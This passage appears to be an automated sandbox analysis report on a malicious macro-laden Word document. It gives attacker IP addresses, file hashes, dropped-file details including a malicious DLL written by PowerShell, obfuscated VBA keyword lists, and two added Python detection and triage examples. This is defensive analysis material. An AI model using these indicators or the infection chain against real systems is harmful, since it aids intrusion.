                                      doc_X_13536.doc | malicious
                                      • 176.53.69.151
                                      ytgeKMQNL2.doc | malicious
                                      • 176.53.69.151
                                      vrhiyc.exe | malicious
                                      • 46.45.148.196
                                      ucrcdh.exe | malicious
                                      • 46.45.148.196
                                      lrbwh.exe | malicious
                                      • 46.45.148.196
                                      ECS9522020111219400053_19280.exe | malicious
                                      • 46.235.9.150
                                      BdBdbczoqd.exe | malicious
                                      • 185.84.181.88
                                      N89uC6re8k.exe | malicious
                                      • 185.84.181.89
                                      SUmXCDNE9J.exe | malicious
                                      • 185.84.181.88
                                      amEXFGJafW.exe | malicious
                                      • 185.84.181.88

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F52C8AA2-B174-499E-B3BD-E7523F18DF93}.tmp
                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):1024
                                      Entropy (8bit):0.05390218305374581
                                      Encrypted:false
                                      SSDEEP:3:ol3lYdn:4Wn
                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):46
                                      Entropy (8bit):1.0424600748477153
                                      Encrypted:false
                                      SSDEEP:3:/lbWwWl:sZ
                                      MD5:3B7B4F5326139F48EFA0AAE509E2FE58
                                      SHA1:209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
                                      SHA-256:D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
                                      SHA-512:C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview: ........................................user.
                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):74
                                      Entropy (8bit):4.37618297427639
                                      Encrypted:false
                                      SSDEEP:3:M1uTspu4oNvsspu4omX1uTspu4ov:MsTspFGUspFGTspFy
                                      MD5:1575B4B03068E9EB1C790279D6F015E9
                                      SHA1:B03BA64F155CB89C56F2BEFD4834DF9592D7FA43
                                      SHA-256:172739674EBD8866CDE6E438FF08DBC63AE51F20C6A69F78BDDCF58B1FEE33AF
                                      SHA-512:02F358E4E8C884FE42D825C68FAA8B656C9D44827F8B17207BD360C4EED0F75C233DDB00789531D1C78FC9009234C9FD0E0B9870074100CE8D1D11B9475B39A3
                                      Malicious:false
                                      Preview: [doc]..pack 2254794.LNK=0..pack 2254794.LNK=0..[doc]..pack 2254794.LNK=0..
                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\pack 2254794.LNK
                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed Aug 26 14:08:16 2020, atime=Wed Jan 6 15:48:37 2021, length=173056, window=hide
                                      Category:dropped
                                      Size (bytes):2048
                                      Entropy (8bit):4.54485733617009
                                      Encrypted:false
                                      SSDEEP:48:8y/XT0jFJ7X8ZjY17XQ/Qh2y/XT0jFJ7X8ZjY17XQ/Q/:8y/XojFJ7XIY17XQ/Qh2y/XojFJ7XIYF
                                      MD5:E3FBD587B484224CD312DA1A8614455A
                                      SHA1:E20B34A9EDFD3E61071E6D6EFC21FA59E85D4056
                                      SHA-256:C4B15C49D33DC71DBFEF56B453F4F0B791BCE90E123A0F54154E3D0C6EA17935
                                      SHA-512:E3A2F426184A78FBC82878300F15DB755A2AC3ACAB2F5EB13F47C1B3415FDCE6DAAB16D10334F398FA4EC90E7420788DE87E1ACE617C537017AB74148CFDC9AB
                                      Malicious:false
                                      Preview: L..................F.... ......{.....{..D...K................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....j.2.....&R.. .PACK22~1.DOC..N.......Q.y.Q.y*...8.....................p.a.c.k. .2.2.5.4.7.9.4...d.o.c.......z...............-...8...[............?J......C:\Users\..#...................\\405464\Users.user\Desktop\pack 2254794.doc.'.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.p.a.c.k. .2.2.5.4.7.9.4...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......405464..........D_....3N...W...9F.C...........[D_....3N...W
                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):162
                                      Entropy (8bit):2.431160061181642
                                      Encrypted:false
                                      SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                      MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                      SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                      SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                      SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                      Malicious:false
                                      Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TTTIA5RUAT24SOYOMUL4.temp
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):8016
                                      Entropy (8bit):3.588015572863861
                                      Encrypted:false
                                      SSDEEP:96:chQCsMqbqvsqvJCwo1z8hQCsMqbqvsEHyqvJCworfzv1YkHKf8OzlUVLIu:cy+o1z8yWHnorfzv+f8OoIu
                                      MD5:C0AE2CE8B209C1783BCC5D0CF773F7B1
                                      SHA1:C42001B1F8B58DB5FB3E44B6743D6B05A52B8FC2
                                      SHA-256:0A8DF82BDDA3CC1BC76384419D818EB89A6D4576954D29C15B2360B001140F38
                                      SHA-512:322BC8DE5B93082BBD69AC84DCA42E997507E91EEEF242E8281353FF4CFFCE0D3ECF73F61234358E48A032AD2DCCAA1E7882EC44F1B09B749746F8C676C24028
                                      Malicious:false
                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                      C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):192000
                                      Entropy (8bit):7.4703735707732735
                                      Encrypted:false
                                      SSDEEP:3072:SwbpDnn9FCrNyVBYF0n3ajFq4weCp2S2MJdhzybMO8dSySA:Ssl9FSaBYF0nVp2MJHybR8dS9
                                      MD5:920A3E39E71AC0FC7ECAC1630AADAF7A
                                      SHA1:2DD3A5B2521C723914D1518111AE27E1825FCD0F
                                      SHA-256:EEF95A9BB33B7458E7EA3AF95B79CDF7B5016C89B70778A6B60E71010EDADF73
                                      SHA-512:D6FE3C10742B6B40A837DC1F5B1700FDF1093243A84E80102FEE0BB45CFC43B2002E76F0F635F9C47598E67E061D70B98C1C7862A1ACC1D6832C5EBE5844192E
                                      Malicious:true
                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..wT..wT..wT......wT.....wT......wT.-....wT.-....wT..wU.SwT.-....wT......wT......wT......wT..w...wT......wT.Rich.wT.........PE..L......_...........!.........J.......E.......................................0.......................................................P.. ...............................8...............................@............................................text............................... ..`.rdata...J.......L..................@..@.data....-... ......................@....rsrc... ....P......................@..@.reloc..H...........................@..B........................................................................................................................................................................................................................................................................................................
                                      C:\Users\user\Desktop\~$ck 2254794.doc
                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):162
                                      Entropy (8bit):2.431160061181642
                                      Encrypted:false
                                      SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                      MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                      SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                      SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                      SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                      Malicious:false
                                      Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
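The dropped-file list above records the sequence a detection engineer wants to catch: powershell.exe writes a PE32 DLL (O_5Z.dll, flagged malicious) into a random-named directory under the user profile, and C:\Windows\SysWOW64\rundll32.exe is running shortly afterwards (it is the process that wrote the RSA key-container file). The following is an added example, not part of the report or of any sandbox tooling, of that correlation in Python over constructed Sysmon-style events (EventID 11 FileCreate, EventID 1 ProcessCreate). The DLL path, the PowerShell image and the SysWOW64 rundll32 image are taken from the report; the timestamps, the rundll32 command line (assumed to use the common `rundll32.exe <dll>,<export>` form) and the benign shell32.dll contrast case are assumptions made for the example:

```python
import re
from datetime import datetime, timedelta

# Constructed events shaped like Sysmon EventID 11 (FileCreate) and EventID 1
# (ProcessCreate). Image and DLL paths follow the report; timestamps and the
# rundll32 command lines are assumptions for this example.
EVENTS = [
    {"id": 11, "ts": "2021-01-06T15:48:40",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll"},
    {"id": 11, "ts": "2021-01-06T15:48:40",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TTTIA5RUAT24SOYOMUL4.temp"},
    {"id": 1, "ts": "2021-01-06T15:48:42",
     "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll,Control_RunDLL"},
    {"id": 1, "ts": "2021-01-06T15:52:00",           # benign contrast case
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

# Processes that should never be the author of a DLL which is then loaded.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "winword.exe", "excel.exe"}
USER_PROFILE = re.compile(r"^[a-z]:\\users\\[^\\]+\\", re.I)
# First DLL path on the command line, optionally quoted, up to a comma/space.
DLL_ARG = re.compile(r'"?([a-z]:\\[^",\s]+?\.dll)"?', re.I)


def _ts(s):
    return datetime.fromisoformat(s)


def _base(path):
    return path.rsplit("\\", 1)[-1].lower()


def correlate(events, window=timedelta(seconds=300)):
    """Return one finding per rundll32 launch whose DLL lives under a user profile.

    Severity is 'medium' on the path alone and 'high' when a script host wrote
    that same DLL within `window` before the launch (write-then-load chain).
    """
    dll_writes = {}  # normalised DLL path -> (write time, writer image)
    findings = []
    for e in sorted(events, key=lambda e: _ts(e["ts"])):
        if e["id"] == 11:
            if e["target"].lower().endswith(".dll") and _base(e["image"]) in SCRIPT_HOSTS:
                dll_writes[e["target"].lower()] = (_ts(e["ts"]), e["image"])
            continue
        if e["id"] == 1 and _base(e["image"]) == "rundll32.exe":
            m = DLL_ARG.search(e["cmdline"])
            if not m or not USER_PROFILE.match(m.group(1)):
                continue  # system DLLs (shell32 etc.) are not interesting here
            dll = m.group(1)
            finding = {"ts": e["ts"], "dll": dll, "severity": "medium", "writer": None}
            w = dll_writes.get(dll.lower())
            if w and timedelta(0) <= _ts(e["ts"]) - w[0] <= window:
                finding["severity"] = "high"
                finding["writer"] = w[1]
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in correlate(EVENTS):
        print(f["severity"], f["dll"], "written by", f["writer"])
```

The path test alone already separates the report's O_5Z.dll from ordinary control-panel launches of shell32.dll; the write-then-load correlation is what lifts it to a high-confidence alert, because legitimate software installs DLLs with an installer process, not with PowerShell.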

                                      Static File Info

                                      General

                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: backing up Grove Avon systematic copy THX Steel functionalities Upgradable infrastructure Technician, Author: Clmence Nguyen, Template: Normal.dotm, Last Saved By: Quentin Collet, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 5 06:14:00 2021, Last Saved Time/Date: Tue Jan 5 06:14:00 2021, Number of Pages: 1, Number of Words: 3222, Number of Characters: 18371, Security: 8
                                      Entropy (8bit):6.685015184938068
                                      TrID:
                                      • Microsoft Word document (32009/1) 79.99%
                                      • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                      File name:pack 2254794.doc
                                      File size:172398
                                      MD5:1e1ec8dd9b25146cc2104be64d6f9bf0
                                      SHA1:d7253cfd0015dbb38c6e2bb602216468d83e4b4a
                                      SHA256:048e5df452e4ba303faa434c138839e4fdf6e8e5004ced58aa30569573eda17e
                                      SHA512:8941fa4e0ef02a23663db80b63cae810a059a711e1254ea404ed63607a56ebac5a1e7f2d86279edbe4120225b2ac0ee4e4b11071d73db7b1867140d53723be23
                                      SSDEEP:3072:59ufstRUUKSns8T00JSHUgteMJ8qMD7g5CeISWpsbP:59ufsfgIf0pL57I/8P
                                      File Content Preview:........................>......................................................................................................................................................................................................................................

                                      File Icon

                                      Icon Hash:e4eea2aaa4b4b4a4

                                      Static OLE Info

                                      General

                                      Document Type:OLE
                                      Number of OLE Files:1

                                      OLE File "pack 2254794.doc"

                                      Indicators

                                      Has Summary Info:True
                                      Application Name:Microsoft Office Word
                                      Encrypted Document:False
                                      Contains Word Document Stream:True
                                      Contains Workbook/Book Stream:False
                                      Contains PowerPoint Document Stream:False
                                      Contains Visio Document Stream:False
                                      Contains ObjectPool Stream:
                                      Flash Objects Count:
                                      Contains VBA Macros:True

                                      Summary

                                      Code Page:1252
                                      Title:
                                      Subject:backing up Grove Avon systematic copy THX Steel functionalities Upgradable infrastructure Technician
                                      Author:Clmence Nguyen
                                      Keywords:
                                      Comments:
                                      Template:Normal.dotm
                                      Last Saved By:Quentin Collet
                                      Revision Number:1
                                      Total Edit Time:0
                                      Create Time:2021-01-05 06:14:00
                                      Last Saved Time:2021-01-05 06:14:00
                                      Number of Pages:1
                                      Number of Words:3222
                                      Number of Characters:18371
                                      Creating Application:Microsoft Office Word
                                      Security:8

                                      Document Summary

                                      Document Code Page:-535
                                      Number of Lines:153
                                      Number of Paragraphs:43
                                      Thumbnail Scaling Desired:False
                                      Company:
                                      Contains Dirty Links:False
                                      Shared Document:False
                                      Changed Hyperlinks:False
                                      Application Version:917504

                                      Streams with VBA

                                      VBA File Name: Oi5oelv0_s4, Stream Size: 17886
                                      General
                                      Stream Path:Macros/VBA/Oi5oelv0_s4
                                      VBA File Name:Oi5oelv0_s4
                                      Stream Size:17886
                                      Data ASCII:. . . . . . . . . | . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . [ k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                      Data Raw:01 16 01 00 00 f0 00 00 00 7c 06 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 83 06 00 00 93 30 00 00 00 00 00 00 01 00 00 00 ae c5 5b 6b 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
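The keyword list the report extracts from this stream (listed below) is dominated by junk code: repeated CreateTextFile calls on paths such as XFtOCOULb:\dMKcFHF\GAGPCEp.ZPnnAM, whose "drive" is several letters long and therefore can never resolve on Windows, bare line labels (the GOTO targets behind the obfuscation signature), a Resume statement and a Mid(Application.Name, ...) slice that builds a string from the host application's name instead of a literal. The following is an added example, not part of the report or of any extraction tool, of a triage pass over such a keyword list in Python. The input is a constructed subset of the report's tokens plus one syntactically valid path as a contrast case; the scoring weights and thresholds are assumptions chosen for the example:

```python
import re

# Constructed sample: a subset of the tokens the report lists for
# Macros/VBA/Oi5oelv0_s4, one per line, plus one valid path (fso.CreateTextFile)
# added as a contrast case. Not the full extracted keyword list.
KEYWORDS = r"""
DyjPBI
Object
AybxtEBCJ.Close
JhiYfXc:
UUoAB.CreateTextFile("XFtOCOULb:\dMKcFHF\GAGPCEp.ZPnnAM")
PmBxcD:
ChWZVJiB.CreateTextFile("gMEpHB:\SKWvYCA\YtZqA.fQoAE")
bPFNuJ.WriteLine
Resume
Mid(Application.Name,
QZjuH.CreateTextFile("EEGvGuF:\XrXnHGDDB\noadJZ.yGcKj")
VJbwzTDT:
fso.CreateTextFile("C:\Temp\out.txt")
VB_Name
"""

CALL_PATH = re.compile(r'CreateTextFile\("([^"]*)"\)')
WIN_DRIVE = re.compile(r"^[A-Za-z]:\\")     # a real drive spec is one letter plus a colon
LABEL = re.compile(r"^[A-Za-z_]\w*:$")      # a bare VBA line label


def triage(keyword_text, label_threshold=3):
    """Score an extracted keyword list for dead-code and control-flow obfuscation.

    Returns the per-indicator counts, an additive score (weights are assumptions)
    and a verdict; paths whose drive part is not a single letter are reported
    because such calls can never succeed and exist only to bulk up the macro.
    """
    lines = [l.strip() for l in keyword_text.splitlines() if l.strip()]
    f = {"tokens": len(lines), "invalid_paths": [], "valid_paths": [],
         "labels": 0, "resume": 0, "app_name_slices": 0}
    for line in lines:
        m = CALL_PATH.search(line)
        if m:
            bucket = "valid_paths" if WIN_DRIVE.match(m.group(1)) else "invalid_paths"
            f[bucket].append(m.group(1))
        if LABEL.match(line):
            f["labels"] += 1
        if line == "Resume" or line.startswith("Resume "):
            f["resume"] += 1
        if line.startswith("Mid(Application.Name"):
            f["app_name_slices"] += 1

    score = 0
    if f["invalid_paths"]:
        score += 3          # file calls that cannot work: decoy code
    if f["labels"] >= label_threshold:
        score += 2          # many labels: GOTO-driven control flow
    if f["resume"]:
        score += 1          # error-handler flow used as a jump
    if f["app_name_slices"]:
        score += 2          # strings assembled from the host name, no literals
    f["score"] = score
    f["verdict"] = "suspicious" if score >= 5 else "unremarkable"
    return f


if __name__ == "__main__":
    result = triage(KEYWORDS)
    print(result["verdict"], result["score"], result["invalid_paths"])
```

The invalid-drive check is the cheapest signal of the four and the hardest for an author to remove: the decoy calls are there precisely so the macro contains enough "real-looking" API activity, and any path that would actually resolve on a victim machine would leave a file behind.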

                                      VBA Code Keywords

                                      Keyword
                                      DyjPBI
                                      dLrgANHCG
                                      EajdMLeD
                                      rgBSB
                                      Object
                                      yjNpyrf
                                      rJqMZII
                                      PGiog
                                      T_dehutl_mggmhizd
                                      EUMDPGt
                                      xkJxAAC
                                      AybxtEBCJ.Close
                                      JhiYfXc:
                                      VusSK
                                      "fUwLgjVtQyH"
                                      UUoAB.CreateTextFile("XFtOCOULb:\dMKcFHF\GAGPCEp.ZPnnAM")
                                      bGnhXCA
                                      VJbwzTDT.Close
                                      VwnpBElhO
                                      MMAqSI
                                      UPhhYZEF
                                      "bVawaPADALVlWFFA"
                                      NFWzF
                                      "HiTyACJmCuGQFFJ"
                                      sGvJJWh
                                      PmBxcD:
                                      SfMKIOk
                                      "TthascRlxHZH"
                                      AybxtEBCJ:
                                      SFmrEDJ
                                      zOBhOx
                                      fUGQf
                                      numuq
                                      rEeiBJ
                                      ChWZVJiB.CreateTextFile("gMEpHB:\SKWvYCA\YtZqA.fQoAE")
                                      RkPWCDPC
                                      JADCpjk
                                      PmBxcD
                                      pDPzBJmM
                                      bGMXEIA.CreateTextFile("grPSDMS:\lQkJoR\aZMUgjGC.pVvhaH")
                                      WSARpB
                                      EUMDPGt.Close
                                      HnBvAEH
                                      "WXovaGHxqSlUt"
                                      QEIFFM
                                      bPFNuJ.WriteLine
                                      "PzrrnIFtpmxAx"
                                      EUMDPGt:
                                      ilONFzHG
                                      "akTuJaIGmZrUyF"
                                      qpOWEIHHA
                                      yJouG
                                      XwZxsHCGt
                                      FTalMbF
                                      XDJPUW
                                      "ALpzEMcwuWl"
                                      gQxBD:
                                      UUoAB
                                      VBA Code
                                      VBA File Name: Qafkrimwsho, Stream Size: 697
                                      General
                                      Stream Path:Macros/VBA/Qafkrimwsho
                                      VBA File Name:Qafkrimwsho
                                      Stream Size:697

                                      VBA Code Keywords

                                      Keyword
                                      Attribute
                                      VB_Name
                                      "Qafkrimwsho"
                                      VBA Code
                                      VBA File Name: Wm_t404p8v_, Stream Size: 1106
                                      General
                                      Stream Path:Macros/VBA/Wm_t404p8v_
                                      VBA File Name:Wm_t404p8v_
                                      Stream Size:1106

                                      VBA Code Keywords

                                      Keyword
                                      False
                                      Private
                                      VB_Exposed
                                      Attribute
                                      VB_Creatable
                                      VB_Name
                                      Document_open()
                                      VB_PredeclaredId
                                      VB_GlobalNameSpace
                                      VB_Base
                                      VB_Customizable
                                      VB_TemplateDerived
                                      VBA Code

                                      Streams

                                      Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                      General
                                      Stream Path:\x1CompObj
                                      File Type:data
                                      Stream Size:146
                                      Entropy:4.00187355764
                                      Base64 Encoded:False
                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                      General
                                      Stream Path:\x5DocumentSummaryInformation
                                      File Type:data
                                      Stream Size:4096
                                      Entropy:0.279952994103
                                      Base64 Encoded:False
                                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 528
                                      General
                                      Stream Path:\x5SummaryInformation
                                      File Type:data
                                      Stream Size:528
                                      Entropy:4.08784807247
                                      Base64 Encoded:False
                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                      Stream Path: 1Table, File Type: data, Stream Size: 6424
                                      General
                                      Stream Path:1Table
                                      File Type:data
                                      Stream Size:6424
                                      Entropy:6.13606471955
                                      Base64 Encoded:True
                                      Stream Path: Data, File Type: data, Stream Size: 99189
                                      General
                                      Stream Path:Data
                                      File Type:data
                                      Stream Size:99189
                                      Entropy:7.39018675385
                                      Base64 Encoded:True
                                      Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 488
                                      General
                                      Stream Path:Macros/PROJECT
                                      File Type:ASCII text, with CRLF line terminators
                                      Stream Size:488
                                      Entropy:5.44671163464
                                      Base64 Encoded:True
                                      Data ASCII:I D = " { 3 2 8 4 0 4 E F - 4 1 6 C - 4 D E 8 - 9 A 4 2 - 2 0 1 5 6 D 2 2 2 C 2 6 } " . . D o c u m e n t = W m _ t 4 0 4 p 8 v _ / & H 0 0 0 0 0 0 0 0 . . M o d u l e = Q a f k r i m w s h o . . M o d u l e = O i 5 o e l v 0 _ s 4 . . E x e N a m e 3 2 = " T j 8 d t f s u o p d k " . . N a m e = " m w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 1 0 1 2 B 2 B 0 B 6 B 0 B 6 B 0 B 6 B 0 B 6 " . . D P B = " 8 2 8 0 2 0 5 0 9 3 5 1 9 3
                                      Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 110
                                      General
                                      Stream Path:Macros/PROJECTwm
                                      File Type:data
                                      Stream Size:110
                                      Entropy:3.60650024781
                                      Base64 Encoded:False
                                      Data ASCII:W m _ t 4 0 4 p 8 v _ . W . m . _ . t . 4 . 0 . 4 . p . 8 . v . _ . . . Q a f k r i m w s h o . Q . a . f . k . r . i . m . w . s . h . o . . . O i 5 o e l v 0 _ s 4 . O . i . 5 . o . e . l . v . 0 . _ . s . 4 . . . . .
                                      Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5146
                                      General
                                      Stream Path:Macros/VBA/_VBA_PROJECT
                                      File Type:data
                                      Stream Size:5146
                                      Entropy:5.51240945881
                                      Base64 Encoded:False
                                      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                      Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 630
                                      General
                                      Stream Path:Macros/VBA/dir
                                      File Type:data
                                      Stream Size:630
                                      Entropy:6.3062184781
                                      Base64 Encoded:True
                                      Data ASCII:. r . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m . . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . . . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . . * \\ C . . . . . . . . a . . . ! O f f i
                                      Stream Path: WordDocument, File Type: data, Stream Size: 25134
                                      General
                                      Stream Path:WordDocument
                                      File Type:data
                                      Stream Size:25134
                                      Entropy:3.92042329439
                                      Base64 Encoded:False

                                      Network Behavior

                                      Network Port Distribution
